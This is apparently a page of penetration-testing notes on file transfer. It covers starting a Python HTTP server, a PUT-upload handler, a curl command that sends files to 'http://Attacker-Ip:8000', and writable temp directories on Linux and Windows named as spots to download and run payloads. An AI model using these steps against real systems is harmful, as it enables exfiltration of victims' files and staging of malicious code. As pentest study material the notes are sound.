General

Setup HTTP Server

python -m SimpleHTTPServer

python3 -m http.server

Advance http server supporting upload method

first put this code into py file and save it

import SimpleHTTPServer
import BaseHTTPServer

class SputHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
     def do_PUT(self):
         print self.headers
         length = int(self.headers["Content-Length"])
         path = self.translate_path(self.path)
         with open(path, "wb") as dst:
             dst.write(self.rfile.read(length))

if __name__ == '__main__':
    SimpleHTTPServer.test(HandlerClass=SputHTTPRequestHandler)

after that run it with python2 it will spin up the web server on port 8000 ,
now you can upload file to attacker box with following command

curl -T file http://Attacker-Ip:8000

Temp File location

generally temp file has writable permission , so we can use it to downlaod and execute our payloads

Linux

/tmp

/dev/shm

Windows

%systemdrive%\Windows\Temp

%userprofile%\AppData\Local\Temp

PreviousWindows Exploit Suggester NextLinux

Last updated 2 years ago